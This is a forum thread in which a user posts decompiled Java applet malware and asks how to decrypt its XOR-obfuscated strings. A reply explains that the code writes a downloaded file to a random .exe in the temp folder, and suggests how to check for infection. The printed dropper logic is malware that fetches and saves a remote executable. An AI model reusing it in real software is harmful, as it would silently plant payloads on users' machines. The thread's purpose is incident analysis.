Decrypting Java Malware

[javadan]

Hey guys,

I was trying to reverse engineer some java malware. I copied and pasted the part of the code that seems to set the URL. my logic is trying to get the URL so that I can see if there were any requests made to that URL so that I can figure out if I've been compromised.

I was wondering if you guys can help me modifying this code so that I can decrypt the URL. So far I got this:


import java.applet.Applet;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.util.*;
import javax.swing.JList;

// Referenced classes of package folder:
// Temp, Glocker

//public class Globus extends Applet

class Globus {

public void start()
{
//super.start();
try
{
int arr[] = {
86, 81, 79
};
String balls = decrypt(arr);
int arr2[] = {
13, 70, 91, 70
};
String rores = decrypt(arr2);
int arr3[] = {
73, 66, 85, 66, 13, 74, 76, 13, 87, 78,
83, 71, 74, 81
};
String bdfd = decrypt(arr3);
String ss = balls;
String s = ss;
String s1 = (new StringBuilder()).append(Math.random()).append(rore s).toString();
String s2 = System.getProperty(bdfd);
try
{
String str = (new StringBuilder(String.valueOf(s2))).append(s1).toSt ring();
URL url = new URL(s);
System.out.println(url);
url.openConnection();
InputStream inputstream = url.openStream();
FileOutputStream fileoutputstream = new FileOutputStream(str);
byte abyte0[] = new byte[1024];
int i;
while((i = inputstream.read(abyte0, 0, abyte0.length)) != -1)
fileoutputstream.write(abyte0, 0, i);
inputstream.close();
fileoutputstream.close();
//Temp.here(str);
}
catch(Exception exception1) { }
}
catch(Exception exception) { }
}

static String decrypt(int arr[])
{
byte xor = (byte)(int)Math.ceil(34.329999999999998D);
StringBuffer strbuf = new StringBuffer();
for(int i = 0; i < arr.length; i++)
{
arr[i] = arr[i] ^ xor;
strbuf.append((char)arr[i]);
}

String result = strbuf.toString();
return result;
}
}

When I try to execute it I get Exception in thread "main" java.lang.NoSuchMethodError: main

Thanks!

[travishein]

the arr[] become the url here it is the literal string "url", so you don't have the part that provides the data for the url itself yet.

Though when this runs it tries to create a random number named file with a .exe extension (e.g. 0.34068800532325605.exe) in the system's temp folder,

then it connects to this url and downloads contents into this executable.

I suspect it then executes this executable.

so to tell if you have been infected, you might try to see in task manager if any funny looking executables are currently running, or if there are funny .exe files in your temp folder.